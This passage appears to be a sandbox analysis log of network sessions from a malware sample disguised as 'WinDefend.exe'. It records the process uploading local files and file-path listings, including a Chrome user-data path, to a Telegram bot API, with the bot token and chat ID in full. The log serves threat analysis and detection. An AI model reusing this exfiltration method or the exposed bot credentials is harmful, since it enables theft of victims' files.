2024-05-23 13:34:24 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 63 65 33 65 65 66 62 33 2d 38 36 62 66 2d 34 39 36 38 2d 61 33 35 65 2d 63 32 30 30 33 38 66 33 39 66 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --ce3eefb3-86bf-4968-a35e-c20038f39faeContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:24 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:24 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 63 65 33 65 65 66 62 33 2d 38 36 62 66 2d 34 39 36 38 2d 61 33 35 65 2d 63 32 30 30 33 38 66 33 39 66 61 65 2d 2d 0d 0a Data Ascii: --ce3eefb3-86bf-4968-a35e-c20038f39fae--
2024-05-23 13:34:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	61071	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:24 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="c651678e-ae3a-40a3-951b-c07009491b7f" Host: api.telegram.org Content-Length: 29741 Expect: 100-continue
2024-05-23 13:34:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:25 UTC	40	OUT	Data Raw: 2d 2d 63 36 35 31 36 37 38 65 2d 61 65 33 61 2d 34 30 61 33 2d 39 35 31 62 2d 63 30 37 30 30 39 34 39 31 62 37 66 0d 0a Data Ascii: --c651678e-ae3a-40a3-951b-c07009491b7f
2024-05-23 13:34:25 UTC	105	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 65 6d 70 6c 61 74 65 32 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 65 6d 70 6c 61 74 65 32 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=template2.pdf; filename*=utf-8''template2.pdf
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 31 30 20 30 20 6f 62 6a 20 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 32 39 34 31 31 2f 4f 20 31 36 2f 45 20 32 33 37 36 39 2f 4e 20 31 2f 54 20 32 39 31 36 34 2f 48 20 5b 20 39 35 36 20 32 32 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 78 72 65 66 0d 0a 31 30 20 33 33 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 37 39 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 33 30 39 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 34 33 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 34 37 33 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 34 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 Data Ascii: %PDF-1.6%10 0 obj <</Linearized 1/L 29411/O 16/E 23769/N 1/T 29164/H [ 956 223]>>endobj xref10 330000000016 00000 n0000001179 00000 n0000001309 00000 n0000001435 00000 n0000001473 00000 n0000001544 00000 n000000
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 39 34 34 20 30 20 30 20 37 32 32 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 36 36 37 20 30 20 30 20 30 20 36 36 37 20 30 20 30 20 30 20 33 33 33 20 30 20 30 20 33 33 33 20 30 20 30 20 30 20 36 36 37 20 30 20 34 34 34 5d 2f 42 61 73 65 46 6f 6e 74 2f 4d 4d 44 4e 4e 4e 2b 48 65 6c 76 65 74 69 63 61 2d 42 6c 61 63 6b 2f 46 69 72 73 74 43 68 61 72 20 33 32 2f 45 6e 63 6f 64 69 6e 67 2f 57 69 6e 41 6e 73 69 45 6e 63 6f 64 69 6e 67 2f 54 79 70 65 2f 46 6f 6e 74 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 32 20 30 20 6f 62 6a 5b 2f 49 43 43 42 61 73 65 64 20 33 32 20 30 20 52 5d 0d 65 6e 64 6f 62 Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 944 0 0 722 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 0 0 667 0 0 0 333 0 0 333 0 0 0 667 0 444]/BaseFont/MMDNNN+Helvetica-Black/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>>endobj22 0 obj[/ICCBased 32 0 R]endob
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 74 65 44 65 63 6f 64 65 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 8c 57 4b 72 64 39 08 dc fb 14 75 01 2b f4 45 e2 18 13 bd e8 13 cc ce 9e 88 ee fb 2f 06 5e e9 03 48 af ca 5e 39 b2 24 04 49 2a c5 7b 3c f8 2f 23 ba 90 93 cf 8f 90 d0 b5 9c 1e 9f de b5 52 7c 78 7c 26 97 42 41 7c fc fd f7 23 23 38 68 d9 c7 47 c8 de 61 48 f4 fb 37 a1 d5 79 9f 7d ba 50 5f 2a a1 5f 17 9a 53 ec 21 73 80 0b 6b ce d7 7c 61 cd b5 8a 14 96 51 74 3e 01 ed 62 b4 80 81 9e f9 3c 37 83 6f 7c 8c c0 aa 43 e0 03 f9 e8 4c a9 85 0d 7d a6 f9 f5 f1 eb e3 cf 87 a8 33 27 17 01 7a 01 e0 4a ad 57 01 03 fd 52 28 91 e1 4b 47 57 84 33 ba 22 fc 7e fc 77 65 9d b0 5c 94 45 07 31 f6 13 67 7d ea c4 49 0f ad c5 9c 2c 91 84 66 8f 13 1d a4 07 57 a1 cd 9c 6d 83 ee f8 90 68 70 29 8f 0c 62 6b d7 fe e0 00 c2 cc ab 33 4f Data Ascii: teDecode>>streamHWKrd9u+E/^H^9$I{</#R\|x\|&BA\|##8hGaH7y}P__S!sk\|aQt>b<7o\|CL}3'zJWR(KGW3"~we\E1g}I,fWmhp)bk3O
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: d1 4b 62 d2 4a 73 dd e0 78 bb b5 2b 9d 73 c4 4c 74 c9 75 f1 70 46 f5 9c c3 42 85 af d2 d5 cb f7 75 de 62 8b d8 23 8a ae 38 52 38 4c 15 78 ce ea cd d1 1f ed 2f c2 cf 8c 1d 50 bc 28 ec dc 3e e7 18 cf 05 c9 89 f6 7d d1 e2 a2 df 2e d7 44 d7 32 a6 87 33 aa 2e d7 39 e2 92 f2 72 45 84 10 fd 26 15 b4 23 a9 a6 df 65 fc a4 19 ac 29 ce 8d 7c 29 67 7d ed 96 5c d5 4c 7b a8 62 47 5b 8b eb 4e c7 ca 18 49 8f 44 98 07 ab 27 d2 8a ae 65 4c 0f 67 54 d3 8e 47 ca 75 da 66 a7 3c 79 89 5c 1a 19 8d 62 61 df a4 60 14 15 59 3f 4e 47 e9 cf 54 56 0f c4 a5 94 0d e5 e4 54 7c 2c c3 a9 b4 45 72 ca b6 a2 6b fe 77 ae e2 12 9d 8f 76 54 1c 3d d8 df aa 9f 65 db d1 87 f9 86 49 ca 72 92 dd e6 44 5e 28 f3 5b a0 6b ba d3 c3 19 55 f3 8d f1 54 07 59 f4 f7 d7 eb 7f 01 06 00 c2 22 3b ef 0d 0a 65 6e Data Ascii: KbJsx+sLtupFBub#8R8Lx/P(>}.D23.9rE&#e)\|)g}\L{bG[NID'eLgTGuf<y\ba`Y?NGTVT\|,ErkwvT=eIrD^([kUTY";en
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 3b a9 de ae a8 c7 5c 91 38 b3 c5 d9 f4 c6 2b c6 85 af 02 5d 68 f6 49 b5 3c 57 21 6f ef 12 0a 58 ab f6 be 1f 67 56 05 2c 43 3b 76 b9 dc 50 d4 5e ce 5a 7b f8 8c 49 51 8f d4 6c 66 d0 6c 51 b7 96 ea e6 f4 a2 64 8d a4 8d 3a 0c ae dc 6f d8 f3 23 f5 21 49 ef 46 01 5e 78 f6 8e 03 62 7a b1 5a 45 d7 18 fb 03 27 59 b3 c6 fd d1 53 3c ef db a3 cf 58 1a d7 f0 b1 ca 01 56 6b 76 ac 4e 5d 43 81 e5 4e 5e ae a8 1d fd de 43 e1 36 5e b5 a9 9f 28 72 b2 f4 b9 37 df fc d6 8e 11 4b cb f4 da 8e 09 44 f5 e9 55 14 cf 10 0b b9 0e 63 ac 88 36 bc 1c 71 99 86 55 41 9c 5a 0f 1f 04 97 f4 d2 22 40 a3 da b8 b5 08 c9 36 45 bb 06 f1 9a 03 9e 55 b6 b2 c2 f7 87 7f 24 f0 35 20 3d 92 eb 14 1a 79 a5 b8 57 4d f4 4b b2 0b 7b 7e 14 32 c6 2b 27 5d 22 48 d6 fd 18 af 58 53 52 44 6e e8 36 2a 44 cf 35 36 Data Ascii: ;\8+]hI<W!oXgV,C;vP^Z{IQlflQd:o#!IF^xbzZE'YS<XVkvN]CN^C6^(r7KDUc6qUAZ"@6EU$5 =yWMK{~2+']"HXSRDn6*D56
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 6e 67 74 68 20 32 35 36 2f 46 75 6e 63 74 69 6f 6e 54 79 70 65 20 30 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 45 6e 63 6f 64 65 5b 30 20 32 35 35 5d 2f 42 69 74 73 50 65 72 53 61 6d 70 6c 65 20 38 2f 44 6f 6d 61 69 6e 5b 30 20 31 5d 2f 53 69 7a 65 5b 32 35 36 5d 2f 52 61 6e 67 65 5b 30 20 31 20 30 20 31 20 30 20 31 5d 2f 44 65 63 6f 64 65 5b 30 20 31 20 30 20 31 20 30 20 31 5d 3e 3e 73 74 72 65 61 6d 0d 0a 48 89 a4 d2 69 6f 83 30 0c 06 e0 ff ff e7 a6 b6 14 ca 19 8e 90 03 12 c2 11 0a 14 da 6d 2e 74 5d a5 ad 87 36 eb f9 68 59 96 fd be ed 92 95 8d 37 4e 6a b8 a9 e9 11 cb 27 36 a2 0e a2 6e c8 bc 88 07 31 47 09 0f d3 3c 26 02 33 89 a9 24 bc 00 2c 57 3c 2f 33 51 e6 b2 14 45 2d 55 5d cc 54 a5 cb 59 5d eb 46 ef f5 ac 6d cf f6 5d df cd fa e1 b0 Data Ascii: ngth 256/FunctionType 0/Filter/FlateDecode/Encode[0 255]/BitsPerSample 8/Domain[0 1]/Size[256]/Range[0 1 0 1 0 1]/Decode[0 1 0 1 0 1]>>streamHio0m.t]6hY7Nj'6n1G<&3$,W</3QE-U]TY]Fm]
2024-05-23 13:34:25 UTC	4096	OUT	Data Raw: 6d 66 6c 65 78 2f 4f 74 69 6c 64 65 2f 4f 64 69 65 72 65 73 69 73 2f 6d 75 6c 74 69 70 6c 79 2f 4f 73 6c 61 73 68 2f 55 67 72 61 76 65 2f 55 61 63 75 74 65 2f 55 63 69 72 63 75 6d 66 6c 65 78 2f 55 64 69 65 72 65 73 69 73 2f 59 61 63 75 74 65 2f 54 68 6f 72 6e 2f 67 65 72 6d 61 6e 64 62 6c 73 2f 61 67 72 61 76 65 2f 61 61 63 75 74 65 2f 61 63 69 72 63 75 6d 66 6c 65 78 2f 61 74 69 6c 64 65 2f 61 64 69 65 72 65 73 69 73 2f 61 72 69 6e 67 2f 61 65 2f 63 63 65 64 69 6c 6c 61 2f 65 67 72 61 76 65 2f 65 61 63 75 74 65 2f 65 63 69 72 63 75 6d 66 6c 65 78 2f 65 64 69 65 72 65 73 69 73 2f 69 67 72 61 76 65 2f 69 61 63 75 74 65 2f 69 63 69 72 63 75 6d 66 6c 65 78 2f 69 64 69 65 72 65 73 69 73 2f 65 74 68 2f 6e 74 69 6c 64 65 2f 6f 67 72 61 76 65 2f 6f 61 63 75 74 Data Ascii: mflex/Otilde/Odieresis/multiply/Oslash/Ugrave/Uacute/Ucircumflex/Udieresis/Yacute/Thorn/germandbls/agrave/aacute/acircumflex/atilde/adieresis/aring/ae/ccedilla/egrave/eacute/ecircumflex/edieresis/igrave/iacute/icircumflex/idieresis/eth/ntilde/ograve/oacut
2024-05-23 13:34:25 UTC	739	OUT	Data Raw: 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 77 22 3f Data Ascii: <?xpacket end="w"?
2024-05-23 13:34:25 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	61073	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:25 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 237 Expect: 100-continue
2024-05-23 13:34:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:25 UTC	237	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 34 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+apple-touch-icon-114x114-precomposed.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Capple-touch-icon-114x114-precomposed.png%0ASize%3A+4+KB
2024-05-23 13:34:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:25 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	61074	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:25 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 386 Expect: 100-continue
2024-05-23 13:34:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:26 UTC	386	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 6f 70 62 61 72 5f 66 6c 6f 61 74 69 6e 67 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 Data Ascii: chat_id=1655240967&text=File%3A+topbar_floating_button_hover.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Dat
2024-05-23 13:34:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	61076	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:26 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 160 Expect: 100-continue
2024-05-23 13:34:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:26 UTC	160	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 74 65 6d 70 6c 61 74 65 33 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 44 6f 63 54 65 6d 70 6c 61 74 65 73 25 35 43 45 4e 55 25 35 43 74 65 6d 70 6c 61 74 65 33 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 32 35 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+template3.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CDocTemplates%5CENU%5Ctemplate3.pdf%0ASize%3A+25+KB
2024-05-23 13:34:26 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:26 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	61077	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:26 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160" Host: api.telegram.org Content-Length: 5157 Expect: 100-continue
2024-05-23 13:34:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:28 UTC	40	OUT	Data Raw: 2d 2d 34 61 34 36 33 63 35 62 2d 62 31 66 38 2d 34 61 65 36 2d 62 35 61 38 2d 66 37 63 33 39 62 65 61 33 31 36 30 0d 0a Data Ascii: --4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160
2024-05-23 13:34:28 UTC	159	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 31 31 34 78 31 31 34 2d 70 72 65 63 6f 6d 70 6f 73 65 64 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=apple-touch-icon-114x114-precomposed.png; filename*=utf-8''apple-touch-icon-114x114-precomposed.png
2024-05-23 13:34:28 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 72 00 00 00 72 08 06 00 00 00 8f dd 85 7d 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 0a c3 00 00 0a c3 01 34 29 24 ab 00 00 00 16 74 45 58 74 43 72 65 61 74 69 6f 6e 20 54 69 6d 65 00 31 30 2f 33 30 2f 31 32 62 c2 cd 43 00 00 00 1c 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 46 69 72 65 77 6f 72 6b 73 20 43 53 36 e8 bc b2 8c 00 00 11 fd 49 44 41 54 78 9c ed 5d 6d 50 54 57 9a 7e 2e 65 d5 96 64 1a 6b 4b fc 43 23 e4 9f dd ad f9 b1 76 10 30 e2 24 0a 82 a9 da 28 1f c9 6e 06 51 e2 44 67 26 31 8e 24 31 2a 26 ee 24 02 31 99 4c 10 35 a3 8e 59 95 c8 7c 18 f9 d8 a9 a9 19 24 98 98 a0 06 31 b8 b5 55 4a 37 ba 35 b5 36 74 b3 95 d0 26 65 a3 b0 55 49 d5 dd 1f dd f7 f6 Data Ascii: PNGIHDRrr}sBIT\|dpHYs4)$tEXtCreation Time10/30/12bCtEXtSoftwareAdobe Fireworks CS6IDATx]mPTW~.edkKC#v0$(nQDg&1$1*&$1L5Y\|$1UJ756t&eUI
2024-05-23 13:34:28 UTC	677	OUT	Data Raw: 1e 1f bd 89 a6 da 0d b2 cd e4 4d fb 9a 90 27 51 22 c7 71 e8 68 de a7 d8 ca 12 90 e7 58 80 5a 8d cf b0 b0 f0 99 75 1f f1 0e a9 7a f5 aa 5b 74 80 b5 65 c6 cc d4 5d 1c d9 d1 28 23 71 d5 86 75 58 16 d9 00 16 70 b1 e7 cf 38 7b f2 94 6a 7f 99 b6 1f 61 db 6f 0f c4 35 b9 91 22 5e 89 0e 89 6d 5c 93 1d 2b cb 8c b3 ed a7 e0 f3 46 9f ce 67 e7 e4 a0 6a cb 0b 32 9b f1 1b 37 71 64 c7 ee 68 9f c2 b8 91 df 9b f6 35 23 5b b2 cf c8 02 89 da 6f 4d 7a b2 c3 2a d1 19 e8 ea 81 74 45 5f f5 d2 0b c8 94 fc 55 8d f1 1b 37 d1 54 5b 2f ef 53 f2 be b6 f1 35 b8 4b 57 10 f9 42 e2 0f 0d 92 b5 04 31 b2 a1 4a 76 58 85 d9 c9 89 68 e2 92 9d 93 83 65 95 4f 89 7d 8f df b8 89 e6 75 f5 b2 b0 2b c5 b2 b5 6b 50 be 7e 5d 4a ad 17 cd b4 4d f4 7c 49 94 ec 90 38 a5 45 76 49 d5 1a b1 7e 6c f4 06 9a 74 Data Ascii: M'Q"qhXZuz[te](#quXp8{jao5"^m\+Fgj27qdh5#[oMz*tE_U7T[/S5KWB1JvXheO}u+kP~]JM\|I8EvI~lt
2024-05-23 13:34:28 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 34 61 34 36 33 63 35 62 2d 62 31 66 38 2d 34 61 65 36 2d 62 35 61 38 2d 66 37 63 33 39 62 65 61 33 31 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:28 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:28 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 34 61 34 36 33 63 35 62 2d 62 31 66 38 2d 34 61 65 36 2d 62 35 61 38 2d 66 37 63 33 39 62 65 61 33 31 36 30 2d 2d 0d 0a Data Ascii: --4a463c5b-b1f8-4ae6-b5a8-f7c39bea3160--
2024-05-23 13:34:28 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:28 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	61079	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:28 UTC	234	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="3c1241bd-4ab9-4d98-b7e6-c2f6c8b0721e" Host: api.telegram.org Content-Length: 26578 Expect: 100-continue
2024-05-23 13:34:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:28 UTC	40	OUT	Data Raw: 2d 2d 33 63 31 32 34 31 62 64 2d 34 61 62 39 2d 34 64 39 38 2d 62 37 65 36 2d 63 32 66 36 63 38 62 30 37 32 31 65 0d 0a Data Ascii: --3c1241bd-4ab9-4d98-b7e6-c2f6c8b0721e
